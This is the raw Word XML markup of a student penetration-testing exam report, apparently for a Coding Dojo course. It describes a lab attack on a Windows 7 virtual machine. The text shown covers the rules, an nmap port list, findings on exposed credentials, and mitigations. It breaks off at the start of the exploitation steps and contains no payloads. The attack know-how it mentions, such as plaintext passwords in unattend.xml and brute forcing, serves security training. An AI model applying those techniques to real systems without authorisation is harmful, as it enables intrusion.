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2269901"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Cover Pages"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="022F885B" w14:textId="5421D228" w:rsidR="001F43CD" w:rsidRDefault="001F43CD">
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <mc:AlternateContent>
              <mc:Choice Requires="wpg">
                <w:drawing>
                  <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="748EBBC2" wp14:editId="4CB79B67">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31C0EE2" w14:textId="77777777" w:rsidR="001F43CD" w:rsidRDefault="001F43C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04" y="7451678"/>
                                <a:ext cx="6843395" cy="1174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FDB4A" w14:textId="298F64B4" w:rsidR="001F43CD" w:rsidRDefault="001F43C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Final Belt Exam</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="751C8929" w14:textId="5676C851" w:rsidR="001F43CD"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1F43CD">
                                        <w:rPr>
                                          <w:color w:val="4472C4" w:themeColor="accent1"/>
                                          <w:sz w:val="36"/>
                                          <w:szCs w:val="36"/>
                                        </w:rPr>
                                        <w:t>Robert Christopherson</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EBBC2"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31C0EE2" w14:textId="77777777" w:rsidR="001F43CD" w:rsidRDefault="001F43C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74516;width:68433;height:117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44CFDB4A" w14:textId="298F64B4" w:rsidR="001F43CD" w:rsidRDefault="001F43C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Final Belt Exam</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="751C8929" w14:textId="5676C851" w:rsidR="001F43CD" w:rsidRDefault="00000000">
                            <w:pPr>
                              <w:pStyle w:val="NoSpacing"/>
                              <w:spacing w:before="120"/>
                              <w:rPr>
                                <w:color w:val="4472C4" w:themeColor="accent1"/>
                                <w:sz w:val="36"/>
                                <w:szCs w:val="36"/>
                              </w:rPr>
                            </w:pPr>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r w:rsidR="001F43CD">
                                  <w:rPr>
                                    <w:color w:val="4472C4" w:themeColor="accent1"/>
                                    <w:sz w:val="36"/>
                                    <w:szCs w:val="36"/>
                                  </w:rPr>
                                  <w:t>Robert Christopherson</w:t>
                                </w:r>
                              </w:sdtContent>
                            </w:sdt>
                          </w:p>
                        </w:txbxContent>
                      </v:textbox>
                    </v:shape>
                    <w10:wrap anchorx="page" anchory="page"/>
                  </v:group>
                </w:pict>
              </mc:Fallback>
            </mc:AlternateContent>
          </w:r>
        </w:p>
        <w:p w14:paraId="179B4D75" w14:textId="30881DF3" w:rsidR="001F43CD" w:rsidRDefault="00F408C6">
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <mc:AlternateContent>
              <mc:Choice Requires="wps">
                <w:drawing>
                  <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0725D6D1" wp14:editId="73378387">
                    <wp:simplePos x="0" y="0"/>
                    <wp:positionH relativeFrom="column">
                      <wp:posOffset>-348833</wp:posOffset>
                    </wp:positionH>
                    <wp:positionV relativeFrom="paragraph">
                      <wp:posOffset>198196</wp:posOffset>
                    </wp:positionV>
                    <wp:extent cx="1705970" cy="545911"/>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1705970" cy="545911"/>
                            </a:xfrm>
                            <a:prstGeom prst="rect">
                              <a:avLst/>
                            </a:prstGeom>
                            <a:noFill/>
                            <a:ln w="6350">
                              <a:noFill/>
                            </a:ln>
                          </wps:spPr>
                          <wps:txbx>
                            <w:txbxContent>
                              <w:p w14:paraId="06288F60" w14:textId="4795278E" w:rsidR="00F408C6" w:rsidRPr="00F408C6" w:rsidRDefault="00F408C6">
                                <w:pPr>
                                  <w:rPr>
                                    <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                    <w:sz w:val="48"/>
                                    <w:szCs w:val="48"/>
                                  </w:rPr>
                                </w:pPr>
                                <w:r w:rsidRPr="00F408C6">
                                  <w:rPr>
                                    <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                    <w:sz w:val="48"/>
                                    <w:szCs w:val="48"/>
                                  </w:rPr>
                                  <w:t>Coding Dojo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D6D1" id="Text Box 23" o:spid="_x0000_s1036" type="#_x0000_t202" style="position:absolute;margin-left:-27.45pt;margin-top:15.6pt;width:134.35pt;height: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" filled="f" stroked="f" strokeweight=".5pt">
                    <v:textbox>
                      <w:txbxContent>
                        <w:p w14:paraId="06288F60" w14:textId="4795278E" w:rsidR="00F408C6" w:rsidRPr="00F408C6" w:rsidRDefault="00F408C6">
                          <w:pPr>
                            <w:rPr>
                              <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                              <w:sz w:val="48"/>
                              <w:szCs w:val="48"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r w:rsidRPr="00F408C6">
                            <w:rPr>
                              <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                              <w:sz w:val="48"/>
                              <w:szCs w:val="48"/>
                            </w:rPr>
                            <w:t>Coding Dojo</w:t>
                          </w:r>
                        </w:p>
                      </w:txbxContent>
                    </v:textbox>
                  </v:shape>
                </w:pict>
              </mc:Fallback>
            </mc:AlternateContent>
          </w:r>
          <w:r w:rsidR="00641B0C" w:rsidRPr="00641B0C">
            <w:rPr>
              <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
            </w:rPr>
            <w:t>January 14, 2023</w:t>
          </w:r>
          <w:r w:rsidR="001F43CD">
            <w:br w:type="page"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="200433B9" w14:textId="600B157A" w:rsidR="00634DD3" w:rsidRDefault="001F43CD" w:rsidP="005B1744">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF403B7" w14:textId="053A2CEE" w:rsidR="007D6039" w:rsidRPr="005B1744" w:rsidRDefault="005B1744" w:rsidP="005B1744">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1744">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA4CFE4" w14:textId="6211D247" w:rsidR="007D6039" w:rsidRDefault="007D6039" w:rsidP="005B1744">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Objective</w:t>
      </w:r>
      <w:r w:rsidR="002A60AE">
        <w:t>………………………………………………………………………………………..(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6325D857" w14:textId="647C9A2A" w:rsidR="005B1744" w:rsidRDefault="007D6039" w:rsidP="005B1744">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="600" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Requirements</w:t>
      </w:r>
      <w:r w:rsidR="002A60AE">
        <w:t>…………………………………………………………………………………(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025D715E" w14:textId="1A6AA5BE" w:rsidR="005B1744" w:rsidRPr="005B1744" w:rsidRDefault="005B1744" w:rsidP="005B1744">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="600" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1744">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>High Level Summary</w:t>
      </w:r>
      <w:r w:rsidR="002A60AE">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>…………………………………………..(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C94235E" w14:textId="056AFF7C" w:rsidR="007D6039" w:rsidRPr="005B1744" w:rsidRDefault="00ED31B1" w:rsidP="005B1744">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="600" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1744">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Recommendations and Mitigations</w:t>
      </w:r>
      <w:r w:rsidR="002A60AE">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>…………………….(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515FB162" w14:textId="04897834" w:rsidR="00ED31B1" w:rsidRPr="005B1744" w:rsidRDefault="00ED31B1" w:rsidP="005B1744">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1744">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Methodologies</w:t>
      </w:r>
      <w:r w:rsidR="002A60AE">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>……………………………………………………(3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E80B94E" w14:textId="1D3027B7" w:rsidR="00ED31B1" w:rsidRDefault="00ED31B1" w:rsidP="005B1744">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Information gathering</w:t>
      </w:r>
      <w:r w:rsidR="002A60AE">
        <w:t>……………………………………….…………………………….(3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B52256" w14:textId="74B9F670" w:rsidR="00ED31B1" w:rsidRDefault="00ED31B1" w:rsidP="005B1744">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Service Enumeration</w:t>
      </w:r>
      <w:r w:rsidR="002A60AE">
        <w:t>…..…………………………………….…………………………….(3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E30F3DF" w14:textId="1B12A80A" w:rsidR="00B02E77" w:rsidRDefault="00ED31B1" w:rsidP="005B1744">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="600" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Exploitation</w:t>
      </w:r>
      <w:r w:rsidR="002A60AE">
        <w:t>……………………………………………………………………………………..(3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C9FB30" w14:textId="34DFDB6A" w:rsidR="00641B0C" w:rsidRDefault="00B02E77" w:rsidP="00641B0C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="600" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B1744">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Cleanup</w:t>
      </w:r>
      <w:r w:rsidR="002A60AE">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>……………………………………………………………..(15)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163998ED" w14:textId="3DC72DEF" w:rsidR="00D0043A" w:rsidRDefault="00D0043A" w:rsidP="00D0043A">
      <w:pPr>
        <w:spacing w:line="600" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D39F1AF" w14:textId="52F98178" w:rsidR="00D0043A" w:rsidRDefault="00D0043A" w:rsidP="00D0043A">
      <w:pPr>
        <w:spacing w:line="600" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79072F5C" w14:textId="77777777" w:rsidR="00D0043A" w:rsidRDefault="00D0043A" w:rsidP="00D0043A">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25555EC8" w14:textId="35A79DD3" w:rsidR="00D0043A" w:rsidRDefault="00D0043A" w:rsidP="00D0043A">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Before the lab starts its always a god idea to create snapshots of your machines before and during the lab in case something breaks, so you can roll back to a working version easily. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5E7F77" w14:textId="6AE64E86" w:rsidR="00D0043A" w:rsidRPr="00D0043A" w:rsidRDefault="00D0043A" w:rsidP="00D0043A">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">All terminal commands will be </w:t>
      </w:r>
      <w:r w:rsidRPr="00D0043A">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>highlighted</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as such</w:t>
      </w:r>
      <w:r w:rsidR="008836C3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510EAF95" w14:textId="77777777" w:rsidR="00B02E77" w:rsidRDefault="00B02E77">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3884C0D9" w14:textId="54EF3344" w:rsidR="00B02E77" w:rsidRPr="0072634E" w:rsidRDefault="0072634E" w:rsidP="0072634E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1.0 </w:t>
      </w:r>
      <w:r w:rsidR="005B1744" w:rsidRPr="0072634E">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EC9F0A" w14:textId="6E7EAE22" w:rsidR="00B02E77" w:rsidRDefault="00B02E77" w:rsidP="00B02E77">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CEB311C" w14:textId="139851D3" w:rsidR="00B02E77" w:rsidRDefault="00B02E77" w:rsidP="00B02E77">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1 </w:t>
      </w:r>
      <w:r w:rsidR="005B1744">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D0F3D7" w14:textId="1AED9A78" w:rsidR="005B1744" w:rsidRDefault="005B1744" w:rsidP="00B02E77">
      <w:r>
        <w:t xml:space="preserve">Attack a black box machine in order to gain root access to the machine and obtain specified flags along the way. The purpose of this exam is to demonstrate full capability and competency in pentesting techniques and practices. In addition, this exam also proves a learning platform to further increase education. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A8A0C9" w14:textId="4F86C58A" w:rsidR="005B1744" w:rsidRPr="00B43C57" w:rsidRDefault="005B1744" w:rsidP="00B02E77">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B43C57">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>1.2 Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005516E1" w14:textId="16BF194F" w:rsidR="005B1744" w:rsidRDefault="005B1744" w:rsidP="00B02E77">
      <w:r>
        <w:t>The attacker will have no information about the victim machine, thus a black box. There is one Red flag that is required to pass the exam and a Black flag that will be to achieve a higher score. Black flag will be Root</w:t>
      </w:r>
      <w:r w:rsidR="00B43C57">
        <w:t xml:space="preserve"> and the red flag will be User. The victim machine is a Windows 7 Virtual Machine, and the attacker machine will be a Kali Linux VM. There are bonus flags hidden inside the machine available to grab as well. Screenshots will be taken during the assignment as proof of completion along with a walk through of the steps completed. This exercise is open note and will allow the use of online recourses as such a practical exam would. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019EB738" w14:textId="217B1168" w:rsidR="00B43C57" w:rsidRDefault="00B43C57" w:rsidP="00B02E77"/>
    <w:p w14:paraId="095791FC" w14:textId="77777777" w:rsidR="00B43C57" w:rsidRDefault="00B43C57" w:rsidP="00B02E77"/>
    <w:p w14:paraId="0C8B6FE6" w14:textId="7285555B" w:rsidR="00B43C57" w:rsidRPr="00B43C57" w:rsidRDefault="00B43C57" w:rsidP="0072634E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B43C57">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>2.0 High Level Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBB1D91" w14:textId="1A146BD4" w:rsidR="00B43C57" w:rsidRDefault="00B43C57" w:rsidP="00B02E77">
      <w:r>
        <w:t>Throughout the engagement I was able to gain access to sensitive information such as user credentials that were either in plain text or hidden with basic encoding. With the help of some brute forcing and clever guesswork, this allowed relatively easy access to lateral movement within the machine to other users and services. Misconfigurations and lazy password hygiene were ultimately the key factors resulting in the machine being fully exploited.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C796847" w14:textId="0E2FC486" w:rsidR="00B43C57" w:rsidRDefault="00B43C57" w:rsidP="00B02E77"/>
    <w:p w14:paraId="721701AB" w14:textId="0304B65D" w:rsidR="0072634E" w:rsidRPr="0072634E" w:rsidRDefault="0072634E" w:rsidP="00B02E77">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0072634E">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>3.0 Recommendations and Mitigations</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F28ECE4" w14:textId="73CBCA32" w:rsidR="0072634E" w:rsidRDefault="0072634E" w:rsidP="00B02E77">
      <w:r>
        <w:t xml:space="preserve">To increase the security of the machine it is recommended to install the latest patches and updates. Ensure that group policy configurations are accurate and low-level users to not share groups with high-level users. Ensure that privileges to create users are kept to only the administrative account. Password hygiene is imperative and needs to be enforced. 12 characters minimum without using common words that could be used in dictionary attacks. </w:t>
      </w:r>
      <w:r w:rsidR="00543BB1">
        <w:t xml:space="preserve">Delete the c:\Windows\Panther\unattend.xml file along with similar files (Google witch files) to prevent plain text passwords from being found. Use least privilege practices and disable ports that are not essential functions. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5FBDFD" w14:textId="77777777" w:rsidR="0072634E" w:rsidRPr="0072634E" w:rsidRDefault="0072634E" w:rsidP="00B02E77"/>
    <w:p w14:paraId="0150EC51" w14:textId="3EB4CEF4" w:rsidR="00B43C57" w:rsidRPr="00B43C57" w:rsidRDefault="0072634E" w:rsidP="0072634E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00B43C57" w:rsidRPr="00B43C57">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>.0 Methodologies</w:t>
      </w:r>
      <w:r w:rsidR="00F55263">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>/Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3249AAA4" w14:textId="77777777" w:rsidR="0072634E" w:rsidRDefault="0072634E" w:rsidP="00B02E77"/>
    <w:p w14:paraId="58E4C8F7" w14:textId="317C84EF" w:rsidR="00B43C57" w:rsidRDefault="0072634E" w:rsidP="00B02E77">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00B43C57" w:rsidRPr="00B43C57">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.1 Information Gathering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487B170E" w14:textId="4F6A4802" w:rsidR="00543BB1" w:rsidRDefault="0072634E" w:rsidP="00B02E77">
      <w:r>
        <w:t>Right off the bat we know this is a Windows 7 Virtual Machine. We know the number of flags to be captured is 2 required flags and 3 optional. Flag may not be obtained via logging into the machine directly. The flags much be obtained via reverse shells connections that are not web based. Proof of flag must include the attackers name in the screenshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C60FC30" w14:textId="44F16784" w:rsidR="0072634E" w:rsidRPr="00543BB1" w:rsidRDefault="0072634E" w:rsidP="00B02E77">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00543BB1">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2 </w:t>
      </w:r>
      <w:r w:rsidR="00543BB1" w:rsidRPr="00543BB1">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Service Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1D14A8" w14:textId="22E48CD9" w:rsidR="00543BB1" w:rsidRDefault="00543BB1" w:rsidP="00B02E77">
      <w:r>
        <w:t>Nmap scan results in our victim IP: 10.0.2.12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ADB9E9" w14:textId="4FB0158E" w:rsidR="00543BB1" w:rsidRDefault="00543BB1" w:rsidP="00543BB1">
      <w:r>
        <w:t>The following ports are open with service names listed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3137D2D6" w14:textId="0FCBC572" w:rsidR="00543BB1" w:rsidRDefault="00543BB1" w:rsidP="00543BB1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>21/tcp – ftp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1412AC0D" w14:textId="7FAF0875" w:rsidR="00543BB1" w:rsidRDefault="00543BB1" w:rsidP="00543BB1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>22/tcp – ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35802DB5" w14:textId="79928B86" w:rsidR="00543BB1" w:rsidRDefault="00543BB1" w:rsidP="00543BB1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>23/tcp – telnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C985B7B" w14:textId="31B71A70" w:rsidR="00543BB1" w:rsidRDefault="00543BB1" w:rsidP="00543BB1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>80/tcp – http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C82CB4D" w14:textId="2FCBE6BB" w:rsidR="00543BB1" w:rsidRDefault="00543BB1" w:rsidP="00543BB1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>135/tcp – msrpc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508C9A36" w14:textId="60602888" w:rsidR="00543BB1" w:rsidRDefault="00543BB1" w:rsidP="00543BB1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>139/tcp – netbios-ssn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FFC531" w14:textId="2277F4D0" w:rsidR="00543BB1" w:rsidRDefault="00543BB1" w:rsidP="00543BB1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>445/tcp – Microsoft-ds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00949008" w14:textId="6AAF88DC" w:rsidR="00543BB1" w:rsidRDefault="00543BB1" w:rsidP="00543BB1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>3306/tcp – mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B226059" w14:textId="6C33CF45" w:rsidR="00543BB1" w:rsidRDefault="00F55263" w:rsidP="00543BB1">
      <w:r>
        <w:t>With this info we know there is a web server running, along with a SQL database, ssh service, ftp service, telnet service and active directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7924190F" w14:textId="5BF04C55" w:rsidR="00543BB1" w:rsidRPr="00543BB1" w:rsidRDefault="00543BB1" w:rsidP="00543BB1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00543BB1">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>4.3 Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05667D61" w14:textId="4D1C9C29" w:rsidR="00CC602E" w:rsidRDefault="00CC602E" w:rsidP="00543BB1">
      <w:r>
        <w:t>Run ifconfig on local machine to determine subnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9FAC88" w14:textId="12C03A4D" w:rsidR="00CC602E" w:rsidRDefault="00CC602E" w:rsidP="00543BB1">
      <w:r w:rsidRPr="00CC602E">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C67C25" w14:textId="5F6200B2" w:rsidR="00CC602E" w:rsidRDefault="001F761C" w:rsidP="00543BB1">
